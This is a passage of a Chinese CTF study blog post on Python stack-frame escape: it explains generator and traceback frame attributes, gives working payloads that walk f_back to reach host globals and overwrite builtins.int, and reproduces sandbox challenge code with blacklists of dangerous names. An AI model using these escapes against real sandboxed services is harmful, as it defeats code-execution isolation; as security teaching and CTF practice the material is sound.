<!DOCTYPE html><html lang="zh-cn" theme-mode="dark"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>py栈帧逃逸 | Hexo</title><link rel="icon" type="image/x-icon" href="/favicon.ico"><link rel="preload" as="font" crossorigin="anonymous" href="/font/Bender.ttf"><link rel="preload" as="font" crossorigin="anonymous" href="/font/BenderLight.woff2"><link rel="preload" as="font" crossorigin="anonymous" href="/font/JetBrainsMono-Regular.woff2"><link rel="stylesheet" href="/css/arknights.css"><style>@font-face {
  font-family: Bender;
  src: local('Bender'), url("/font/Bender.ttf"), url("/font/Bender.otf");
}
@font-face {
  font-family: BenderLight;
  src: local('BenderLight'), url("/font/BenderLight.woff2") format('woff2');
}
@font-face {
  font-family: 'JetBrains Mono';
  src: local('JetBrains Mono'), url('/font/JetBrainsMono-Regular.woff2') format('woff2');
}
</style><meta name="page-config" content="{&quot;code_fold&quot;:null}"><script class="pjax-js">var config = {"root":"/","code_fold":15,"search":{"preload":false,"activeHolder":"键入以继续","blurHolder":"数据检索","noResult":"无 $0 相关数据"},"code":{"codeInfo":"$0 - $1 行","copy":"复制"}};
var page_config = {
  code_fold: null
};
function updatePageConfig() {
  var newPageConfig = document.querySelector('meta[name="page-config"]');
  if (newPageConfig) {
    page_config = JSON.parse(newPageConfig.content);
  }
}
document.addEventListener('pjax:complete', function() { updatePageConfig(); });
updatePageConfig();</script><link type="text/css" rel="stylesheet" href="/lib/encrypt/hbe.style.css"><script src="//unpkg.com/mermaid@10.5.0/dist/mermaid.min.js"></script><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lightgallery.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lg-zoom.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lg-thumbnail.css"><link type="text/css" rel="stylesheet" href="/lib/fontawesome/css/all.min.css"><script>if (window.localStorage.getItem('theme-mode') === 'light')
 document.documentElement.setAttribute('theme-mode', 'light')
if (window.localStorage.getItem('theme-mode') === 'dark')
 document.documentElement.setAttribute('theme-mode', 'dark')</script><style>@font-face {
 font-family: BenderLight;
 src: local('Bender'), url("/font/BenderLight.woff2") format('woff2');
}
@font-face {
 font-family: 'JetBrains Mono';
 src: local('JetBrains Mono'), url('/font/JetBrainsMono-Regular.woff2') format('woff2');
}</style><style>:root {
 --dark-background: url('https://ak.hypergryph.com/assets/index/images/ak/pc/bk.jpg');
 --light-background: url('/img/bk.jpg');
 --theme-encrypt-confirm: '确认'
}</style><script defer src="/js/arknights.js"></script><script defer src="/js/search.js"></script><script defer type="module">import mermaid from '//unpkg.com/mermaid@10.5.0/dist/mermaid.esm.mjs';
window.mermaid = mermaid;
code.paintMermaid();
</script><script async src="//unpkg.com/lightgallery@2.7.1/lightgallery.min.js"></script><script async src="//unpkg.com/lightgallery@2.7.1/plugins/zoom/lg-zoom.min.js"></script><script async src="//unpkg.com/lightgallery@2.7.1/plugins/thumbnail/lg-thumbnail.min.js"></script><script async src="/lib/encrypt/hbe.js"></script><script async src="/js/pjax.js"></script><script class="pjax-js">reset= () => {document.querySelector('.lg-container')?.remove()
lightGallery(document.getElementById('post-bg'), {
  plugins: [lgZoom,lgThumbnail],
  selector: '.item-img'})}</script><script>window.addEventListener("load",() => {pjax = new Pjax({
 cacheBust: false,
 selectors: ['title','article','#aside-block','.pjax-js','data-pjax','.vercount','meta[name=page-config]'],
 switches: {'article': Pjax.switches.sideBySide},
 switchesOptions: {
   'article': {
     classNames: {
       remove: "pjax-out",
       add: "pjax-in"
     }
   }
 }
});
document.addEventListener("pjax:complete", reset);reset()})</script><script class="pjax-js">reset= () => {document.querySelector('.lg-container')?.remove()
const postBg = document.querySelector('#post-bg');
if (postBg) lightGallery(postBg, {
  plugins: [lgZoom,lgThumbnail],
  selector: '.item-img'})}</script><script>window.addEventListener("load",() => {pjax = new Pjax({
 cacheBust: false,
 selectors: ['title','article','#aside-block','.pjax-js','data-pjax','.vercount','meta[name=page-config]'],
 switches: {'article': Pjax.switches.sideBySide},
 switchesOptions: {
   'article': {
     classNames: {
       remove: "pjax-out",
       add: "pjax-in"
     }
   }
 }
});
document.addEventListener("pjax:complete", reset);reset()})</script><meta name="generator" content="Hexo 8.1.1"></head><body><div class="loading" style="opacity: 0;"><div class="loadingBar left"></div><div class="loadingBar right"></div></div><main><header class="closed"><div class="navBtn"><i class="navBtnIcon"><span class="navBtnIconBar"></span><span class="navBtnIconBar"></span><span class="navBtnIconBar"></span></i></div><nav><div class="navItem" id="search-header"><span class="navItemTitle"><input autocomplete="off" autocorrect="off" autocapitalize="none" placeholder="数据检索" spellcheck="false" maxlength="50" type="text" id="search-input"></span></div><div class="navItem" id="search-holder"></div><div class="search-popup" tabindex="0"><div id="search-result"></div></div><ol class="navContent"><li class="navItem"><a class="navBlock" href="/"><span class="navItemTitle">Home</span></a></li><li class="navItem" matchdata="categories,tags"><a class="navBlock" href="/archives/"><span class="navItemTitle">Archives</span></a></li></ol></nav></header><article><div id="post-bg"><div id="post-title"><h1>py栈帧逃逸</h1><div id="post-info"><span>文章发布时间: <div class="control"><time datetime="2025-11-02T08:18:55.000Z" id="date"> 2025-11-02</time></div></span><br><span>最后更新时间: <div class="control"><time datetime="2025-11-02T08:35:30.628Z" id="updated"> 2025-11-02</time></div></span></div></div><hr><div id="post-content"><blockquote>
<p>参考文章<br><a target="_blank" rel="noopener" href="https://xz.aliyun.com/news/13075">https://xz.aliyun.com/news/13075</a><br><a target="_blank" rel="noopener" href="https://forum.butian.net/share/4114">https://forum.butian.net/share/4114</a><br><a target="_blank" rel="noopener" href="https://docs.python.org/zh-cn/3/reference/datamodel.html#traceback-objects">https://docs.python.org/zh-cn/3/reference/datamodel.html#traceback-objects</a></p>
</blockquote>
<h2 id="生成器逃逸"><a href="#生成器逃逸" class="headerlink" title="生成器逃逸"></a>生成器逃逸</h2><h3 id="生成器"><a href="#生成器" class="headerlink" title="生成器"></a>生成器</h3><p><code>生成器(Generator)</code> 是 py 中一个特殊的迭代器，用 yield 定义</p>
<p>yeild 用于产生一个值，保留当前运行状态的同时暂停函数执行，并在下一次调用生成器时，函数从上次暂停的位置继续执行，直到遇到下一个 yeild 字段或函数结束</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">def</span> <span class="hljs-title function_">f</span>():<br>    a=<span class="hljs-number">1</span><br>    <span class="hljs-keyword">while</span> <span class="hljs-literal">True</span>:<br>        <span class="hljs-keyword">yield</span> a<br>        a+=<span class="hljs-number">1</span><br>f=f()<br><span class="hljs-built_in">print</span>(<span class="hljs-built_in">next</span>(f)) <span class="hljs-comment">#1</span><br><span class="hljs-built_in">print</span>(<span class="hljs-built_in">next</span>(f)) <span class="hljs-comment">#2</span><br><span class="hljs-comment">#这里生成器记住了上次的状态，所以会输出2</span><br></code></pre></td></tr></table></figure>

<p>给 a 加范围可以用 for 语句一次性输出</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">def</span> <span class="hljs-title function_">f</span>():<br>    a=<span class="hljs-number">1</span><br>    <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">100</span>):<br>        <span class="hljs-keyword">yield</span> a<br>        a+=<span class="hljs-number">1</span><br>f=f()<br><span class="hljs-keyword">for</span> value <span class="hljs-keyword">in</span> f:<br>    <span class="hljs-built_in">print</span>(value)<br></code></pre></td></tr></table></figure>

<p>可以使用简洁的语法直接定义，不需要定义函数</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs python">a=(i+<span class="hljs-number">1</span> <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">100</span>))<br><span class="hljs-keyword">for</span> value <span class="hljs-keyword">in</span> a:<br>    <span class="hljs-built_in">print</span>(value)<br></code></pre></td></tr></table></figure>

<p><strong>gi_code</strong></p>
<ul>
<li><strong>说明</strong>：生成器关联的代码对象 (code object)。</li>
</ul>
<p><strong>gi_frame</strong></p>
<ul>
<li><strong>说明</strong>：生成器的帧对象 (frame object)，表示生成器当前的执行栈帧。它包含了局部变量、执行点等信息。</li>
</ul>
<p><strong>gi_running</strong></p>
<ul>
<li><strong>说明</strong>：一个布尔值，表示生成器当前是否正在执行。这是为了防止生成器在执行过程中被重入（re-entered）。</li>
</ul>
<p><strong>gi_yieldfrom</strong> (Python 3.3+)</p>
<ul>
<li><strong>说明</strong>：如果生成器当前正在使用 <code>yield from</code> 委托给另一个子生成器或迭代器，这个属性会指向那个子迭代器。否则为 <code>None</code>。</li>
</ul>
<p><strong>gi_frame.f_locals</strong></p>
<ul>
<li><strong>说明:</strong> 一个字典，包含生成器当前帧的本地变量。</li>
</ul>
<h4 id="栈帧属性："><a href="#栈帧属性：" class="headerlink" title="栈帧属性："></a>栈帧属性：</h4><p><strong>f_back</strong>:</p>
<ul>
<li><strong>说明</strong>: 指向调用栈中当前帧的上一帧（即调用当前函数的那个函数的帧）。如果当前帧是调用栈的最底部（通常是模块级别或脚本的起始点），则 <code>f_back</code> 为 <code>None</code>。</li>
<li><strong>用途</strong>: 用于回溯调用栈，了解函数是如何被调用的。调试器常用此属性来展示调用堆栈。</li>
</ul>
<p><strong>f_code</strong>:</p>
<ul>
<li><p><strong>说明</strong>: 当前帧关联的代码对象（code object）。代码对象包含了关于函数本身的静态信息，例如函数的字节码、常量、变量名等。</p>
</li>
<li><p><strong>用途</strong>: 通过 <code>f_code</code> 可以访问到：</p>
<ul>
<li><code>f_code.co_name</code>: 函数的名称。</li>
<li><code>f_code.co_filename</code>: 函数定义所在的文件名。</li>
<li><code>f_code.co_varnames</code>: 函数的局部变量名和参数名（元组）。</li>
<li><code>f_code.co_argcount</code>: 普通参数的个数。</li>
<li><code>f_code.co_firstlineno</code>: 函数在源文件中开始的行号。</li>
</ul>
</li>
</ul>
<p><strong>f_locals</strong>:</p>
<ul>
<li><strong>说明</strong>: 一个字典，包含了当前帧的局部变量（包括函数参数）。字典的键是变量名（字符串），值是变量的实际值。</li>
<li><strong>用途</strong>: 查看或修改（不推荐，但技术上可能）函数的局部变量。调试时非常有用。</li>
</ul>
<p><strong>f_globals</strong>:</p>
<ul>
<li><strong>说明</strong>: 一个字典，包含了当前帧执行时可见的全局变量。这通常是函数定义所在的模块的命名空间。</li>
<li><strong>用途</strong>: 查看或修改（同样不推荐）全局变量。</li>
</ul>
<p><strong>f_builtins</strong>:</p>
<ul>
<li><strong>说明</strong>: 一个字典，包含了当前帧可以访问的内建名称（built-in names），例如 <code>len()</code>, <code>print()</code> 等。</li>
<li><strong>用途</strong>: 了解当前执行环境下的内建函数和常量。</li>
</ul>
<p><strong>f_lineno</strong>:</p>
<ul>
<li><strong>说明</strong>: 当前帧正在执行或即将执行的源代码行号。</li>
<li><strong>用途</strong>: 精确定位代码执行到的位置，对于调试和错误报告至关重要。</li>
</ul>
<p><strong>f_lasti</strong>:</p>
<ul>
<li><strong>说明</strong>: 当前帧中最后执行的字节码指令的索引（相对于 <code>f_code.co_code</code>，即字节码字符串）。如果是 -1，表示还没有字节码指令被执行（例如，在函数刚开始时）。</li>
<li><strong>用途</strong>: 更底层的调试，了解字节码级别的执行情况。</li>
</ul>
<h4 id="生成器栈帧逃逸"><a href="#生成器栈帧逃逸" class="headerlink" title="生成器栈帧逃逸"></a>生成器栈帧逃逸</h4><p>原理：生成器的栈帧对象通过 f_back（返回前一帧）从而逃逸出去获取 globals 全局符号表</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">s3cret=&quot;this is flag&quot;<br><br>codes=&#x27;&#x27;&#x27;<br>def waff():<br>    def f():<br>        yield g.gi_frame.f_back<br><br>    g = f()  #生成器<br><br>    frame = next(g) #获取到生成器的栈帧对象  <br>    #frame = [x for x in g][0] #由于生成器也是迭代器，所以也可以获取到生成器的栈帧对象 <br><br>    b = frame.f_back.f_back.f_globals[&#x27;s3cret&#x27;] #返回并获取前一级栈帧的globals<br>    return b<br>b=waff()<br>&#x27;&#x27;&#x27;<br>locals=&#123;&#125;<br>code = compile(codes, &quot;test&quot;, &quot;exec&quot;)<br>exec(code,locals)<br>print(locals[&quot;b&quot;])<br></code></pre></td></tr></table></figure>

<p>我们仔细看这些代码</p>
<p><code>locals</code> 定义了一个字典作为局部作用域</p>
<p><code>complie(source, filename, mode)</code> 是一个内置函数，用于将 Python 源代码编译成代码对象（code object）</p>
<p><code>source</code> 是要编译的源代码</p>
<p><code>exec</code> 表示在 locals 中执行 code，结果会返回到 locals</p>
<p>我们看到 code 中的内容，定义了一个 waff，定义一个 f，f 是一个生成器函数其中 <code>yeild</code> 了一个 <code>g.gl_frame.f_back</code></p>
<p><code>gl_frame</code> 指的是 f()的栈帧，<code>.f_back</code> 后指 <code>waff()</code> 的栈帧。</p>
<p>frame &#x3D; next(g)获取了生成器的栈帧对象，之后执行 <code>b = frame.f_back.f_back.f_globals[&#39;s3cret&#39;]</code>，一次 <code>back</code> 之后指向执行函数的栈帧也就是 <code>exec</code> 的栈帧(filename 的环境)，再一次 back 之后来到全局的栈帧。<code>f_globals</code> 获取了全局变量字典，从中取出 <code>s3cret</code>，作用域是 <code>locals</code>，所以 locals 中会多出 <code>&quot;b&quot;:&quot;this is flag&quot;</code></p>
<p class='item-img' data-src='https://raw.githubusercontent.com/Yim1ngs/images/refs/heads/main/static/Vs3VbjCswo8cpUx4WcfcY9LWnkd.png'><img src="https://raw.githubusercontent.com/Yim1ngs/images/refs/heads/main/static/Vs3VbjCswo8cpUx4WcfcY9LWnkd.png"></p>
<h4 id="例题："><a href="#例题：" class="headerlink" title="例题："></a>例题：</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> sys<br><span class="hljs-keyword">import</span> os<br>codes=<span class="hljs-string">&#x27;&#x27;&#x27;&lt;&lt;codehere&gt;&gt;&#x27;&#x27;&#x27;</span><br><span class="hljs-keyword">try</span>:<br>    codes.encode(<span class="hljs-string">&quot;ascii&quot;</span>)<br><span class="hljs-keyword">except</span> UnicodeEncodeError:<br>    exit(<span class="hljs-number">0</span>)<br><span class="hljs-keyword">if</span> <span class="hljs-string">&quot;__&quot;</span> <span class="hljs-keyword">in</span> codes:<br>    <span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;__ bypass!!&quot;</span>)<br>    exit(<span class="hljs-number">0</span>)<br>codes+=<span class="hljs-string">&quot;\nres=factorization(c)&quot;</span><br><span class="hljs-built_in">print</span>(codes)<br><span class="hljs-built_in">locals</span>=&#123;<span class="hljs-string">&quot;c&quot;</span>:<span class="hljs-string">&quot;696287028823439285412516128163589070098246262909373657123513205248504673721763725782111252400832490434679394908376105858691044678021174845791418862932607425950200598200060291023443682438196296552959193310931511695879911797958384622729237086633102190135848913461450985723041407754481986496355123676762688279345454097417867967541742514421793625023908839792826309255544857686826906112897645490957973302912538933557595974247790107119797052793215732276223986103011959886471914076797945807178565638449444649884648281583799341879871243480706581561222485741528460964215341338065078004726721288305399437901175097234518605353898496140160657001466187637392934757378798373716670535613637539637468311719923648905641849133472394335053728987186164141412563575941433170489130760050719104922820370994229626736584948464278494600095254297544697025133049342015490116889359876782318981037912673894441836237479855411354981092887603250217400661295605194527558700876411215998415750392444999450257864683822080257235005982249555861378338228029418186061824474448847008690117195232841650446990696256199968716183007097835159707554255408220292726523159227686505847172535282144212465211879980290126845799443985426297754482370702756554520668240815554441667638597863&quot;</span>,<span class="hljs-string">&quot;__builtins__&quot;</span>: <span class="hljs-literal">None</span>&#125;<br>res=<span class="hljs-built_in">set</span>()<br><span class="hljs-keyword">def</span> <span class="hljs-title function_">blackFunc</span>(<span class="hljs-params">oldexit</span>):<br>    <span class="hljs-keyword">def</span> <span class="hljs-title function_">func</span>(<span class="hljs-params">event, args</span>):<br>        blackList =[<span class="hljs-string">&quot;process&quot;</span>,<span class="hljs-string">&quot;os&quot;</span>,<span class="hljs-string">&quot;sys&quot;</span>,<span class="hljs-string">&quot;interpreter&quot;</span>,<span class="hljs-string">&quot;cpython&quot;</span>,<span class="hljs-string">&quot;open&quot;</span>,<span class="hljs-string">&quot;compile&quot;</span>,<span class="hljs-string">&quot;__new__&quot;</span>,<span class="hljs-string">&quot;gc&quot;</span>]<br>        <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> blackList:<br>            <span class="hljs-keyword">if</span> i <span class="hljs-keyword">in</span> (event + <span class="hljs-string">&quot;&quot;</span>.join(<span class="hljs-built_in">str</span>(s) <span class="hljs-keyword">for</span> s <span class="hljs-keyword">in</span> args)).lower():<br>                <span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;noooooooooo&quot;</span>)<br>                <span class="hljs-built_in">print</span>(i)<br>                oldexit(<span class="hljs-number">0</span>)<br>    <span class="hljs-keyword">return</span> func<br>code = <span class="hljs-built_in">compile</span>(codes, <span class="hljs-string">&quot;&lt;judgecode&gt;&quot;</span>, <span class="hljs-string">&quot;exec&quot;</span>)<br>sys.addaudithook(blackFunc(os._exit))<br><span class="hljs-built_in">exec</span>(code,&#123;<span class="hljs-string">&quot;__builtins__&quot;</span>: <span class="hljs-literal">None</span>&#125;,<span class="hljs-built_in">locals</span>)<br><span class="hljs-built_in">print</span>(<span class="hljs-built_in">locals</span>)<br>p=<span class="hljs-built_in">int</span>(<span class="hljs-built_in">locals</span>[<span class="hljs-string">&quot;res&quot;</span>][<span class="hljs-number">0</span>])<br>q=<span class="hljs-built_in">int</span>(<span class="hljs-built_in">locals</span>[<span class="hljs-string">&quot;res&quot;</span>][<span class="hljs-number">1</span>])<br><span class="hljs-keyword">if</span>(p&gt;<span class="hljs-number">1e5</span> <span class="hljs-keyword">and</span> q&gt;<span class="hljs-number">1e5</span> <span class="hljs-keyword">and</span> p*q==<span class="hljs-built_in">int</span>(<span class="hljs-string">&quot;696287028823439285412516128163589070098246262909373657123513205248504673721763725782111252400832490434679394908376105858691044678021174845791418862932607425950200598200060291023443682438196296552959193310931511695879911797958384622729237086633102190135848913461450985723041407754481986496355123676762688279345454097417867967541742514421793625023908839792826309255544857686826906112897645490957973302912538933557595974247790107119797052793215732276223986103011959886471914076797945807178565638449444649884648281583799341879871243480706581561222485741528460964215341338065078004726721288305399437901175097234518605353898496140160657001466187637392934757378798373716670535613637539637468311719923648905641849133472394335053728987186164141412563575941433170489130760050719104922820370994229626736584948464278494600095254297544697025133049342015490116889359876782318981037912673894441836237479855411354981092887603250217400661295605194527558700876411215998415750392444999450257864683822080257235005982249555861378338228029418186061824474448847008690117195232841650446990696256199968716183007097835159707554255408220292726523159227686505847172535282144212465211879980290126845799443985426297754482370702756554520668240815554441667638597863&quot;</span>)):<br>    <span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;Correct!&quot;</span>,end=<span class="hljs-string">&quot;&quot;</span>)<br><span class="hljs-keyword">else</span>:<br>    <span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;Wrong!&quot;</span>,end=<span class="hljs-string">&quot;&quot;</span>)<br></code></pre></td></tr></table></figure>

<p>读代码我们知道要我们写一个函数分解 c 这个超大的数字，且 pq 要同时大于 10000，同时有时间限制，很显然正常的方法几乎不可能符合要求，但这里有个很奇怪的地方，数字是用 int 转换字符串得到的，于是结合栈帧逃逸，我们想到覆盖掉原本的 int 方法，将结果可控</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">def</span> <span class="hljs-title function_">factorization</span>(<span class="hljs-params">c_param</span>):<br>    <span class="hljs-keyword">def</span> <span class="hljs-title function_">fake_int</span>(<span class="hljs-params">i_param</span>):<br>        <span class="hljs-keyword">return</span> <span class="hljs-number">100001</span> * <span class="hljs-number">100002</span><br><br>    a = (a.gi_frame.f_back.f_back <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> [<span class="hljs-number">1</span>])<br><br>    current_function_frame = [x <span class="hljs-keyword">for</span> x <span class="hljs-keyword">in</span> a][<span class="hljs-number">0</span>]<br><br>    host_globals = current_function_frame.f_back.f_back.f_globals<br><br>    builtins_str_name = <span class="hljs-string">&quot;_&quot;</span> + <span class="hljs-string">&quot;_&quot;</span> + <span class="hljs-string">&quot;builtins&quot;</span> + <span class="hljs-string">&quot;_&quot;</span> + <span class="hljs-string">&quot;_&quot;</span><br><br>    host_builtins = host_globals[builtins_str_name]<br><br>    host_builtins.<span class="hljs-built_in">int</span> = fake_int<br><br>    <span class="hljs-keyword">return</span> (<span class="hljs-number">100001</span>, <span class="hljs-number">100002</span>)<br></code></pre></td></tr></table></figure>

<h2 id="异常栈帧逃逸"><a href="#异常栈帧逃逸" class="headerlink" title="异常栈帧逃逸"></a>异常栈帧逃逸</h2><blockquote>
<p>补充说明，什么是回溯对象：<br>回溯对象代表一个 <u>异常</u> 的栈跟踪信息。 当异常发生时会隐式地创建一个回溯对象，也可以通过调用 <u>types.TracebackType</u> 显式地创建。_3.7 版本后_回溯对象可以通过 Python 代码显式地实例化。对于隐式地创建的回溯对象，当查找异常处理器使得执行栈展开时，会在每个展开层级的当前回溯之前插入一个回溯对象。 当进入一个异常处理器时，程序将可以使用栈跟踪。它可作为 <u>sys.exc_info()</u> 所返回的元组的<strong>第三项</strong> ，以及所捕获异常的 <u>traceback</u> 属性被获取。</p>
</blockquote>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">def</span> <span class="hljs-title function_">get_stack_frame_via_exception</span>():<br>    <span class="hljs-keyword">try</span>:<br>        <span class="hljs-keyword">raise</span> Exception<br>    <span class="hljs-keyword">except</span> Exception <span class="hljs-keyword">as</span> e:<br>        tb = e.__traceback__  <span class="hljs-comment"># 获取异常的回溯对象</span><br>        <span class="hljs-keyword">while</span> tb.tb_next:  <span class="hljs-comment"># 遍历到当前帧</span><br>            tb = tb.tb_next<br>        <span class="hljs-keyword">return</span> tb.tb_frame  <span class="hljs-comment"># 返回当前栈帧对象</span><br></code></pre></td></tr></table></figure>

<p>说明：</p>
<p>代码直接给出异常，<code>tb = e.__traceback__</code> 获取异常的回溯对象</p>
<blockquote>
<p>traceback.<strong>tb_next</strong><br>特殊的可写属性 <code>tb_next</code> 是栈跟踪中的下一层级（通往发生异常的帧），如果没有下一层级则为 <code>None</code>。<br>_3.7 版本后_该属性现在是可写的。</p>
</blockquote>
<p>通过循环 tb.tb_next，知道下一层级是 none，此时返回的就是最下面的栈帧，也就逃逸出来了</p>
<h4 id="例题-minil-pybox"><a href="#例题-minil-pybox" class="headerlink" title="例题:minil pybox"></a>例题:minil pybox</h4><p>题目直接给了源码</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> flask <span class="hljs-keyword">import</span> Flask, request, Response<br><span class="hljs-keyword">import</span> multiprocessing<br><span class="hljs-keyword">import</span> sys<br><span class="hljs-keyword">import</span> io<br><span class="hljs-keyword">import</span> ast<br><br>app = Flask(__name__)<br><br><span class="hljs-keyword">class</span> <span class="hljs-title class_">SandboxVisitor</span>(ast.NodeVisitor):<br>    forbidden_attrs = &#123;<br>        <span class="hljs-string">&quot;__class__&quot;</span>, <span class="hljs-string">&quot;__dict__&quot;</span>, <span class="hljs-string">&quot;__bases__&quot;</span>, <span class="hljs-string">&quot;__mro__&quot;</span>, <span class="hljs-string">&quot;__subclasses__&quot;</span>,<br>        <span class="hljs-string">&quot;__globals__&quot;</span>, <span class="hljs-string">&quot;__code__&quot;</span>, <span class="hljs-string">&quot;__closure__&quot;</span>, <span class="hljs-string">&quot;__func__&quot;</span>, <span class="hljs-string">&quot;__self__&quot;</span>,<br>        <span class="hljs-string">&quot;__module__&quot;</span>, <span class="hljs-string">&quot;__import__&quot;</span>, <span class="hljs-string">&quot;__builtins__&quot;</span>, <span class="hljs-string">&quot;__base__&quot;</span><br>    &#125;<br>    <span class="hljs-keyword">def</span> <span class="hljs-title function_">visit_Attribute</span>(<span class="hljs-params">self, node</span>):<br>        <span class="hljs-keyword">if</span> <span class="hljs-built_in">isinstance</span>(node.attr, <span class="hljs-built_in">str</span>) <span class="hljs-keyword">and</span> node.attr <span class="hljs-keyword">in</span> <span class="hljs-variable language_">self</span>.forbidden_attrs:<br>            <span class="hljs-keyword">raise</span> ValueError<br>        <span class="hljs-variable language_">self</span>.generic_visit(node)<br>    <span class="hljs-keyword">def</span> <span class="hljs-title function_">visit_GeneratorExp</span>(<span class="hljs-params">self, node</span>):<br>        <span class="hljs-keyword">raise</span> ValueError<br><span class="hljs-keyword">def</span> <span class="hljs-title function_">sandbox_executor</span>(<span class="hljs-params">code, result_queue</span>):<br>    safe_builtins = &#123;<br>        <span class="hljs-string">&quot;print&quot;</span>: <span class="hljs-built_in">print</span>,<br>        <span class="hljs-string">&quot;filter&quot;</span>: <span class="hljs-built_in">filter</span>,<br>        <span class="hljs-string">&quot;list&quot;</span>: <span class="hljs-built_in">list</span>,<br>        <span class="hljs-string">&quot;len&quot;</span>: <span class="hljs-built_in">len</span>,<br>        <span class="hljs-string">&quot;addaudithook&quot;</span>: sys.addaudithook,<br>        <span class="hljs-string">&quot;Exception&quot;</span>: Exception<br>    &#125;<br>    safe_globals = &#123;<span 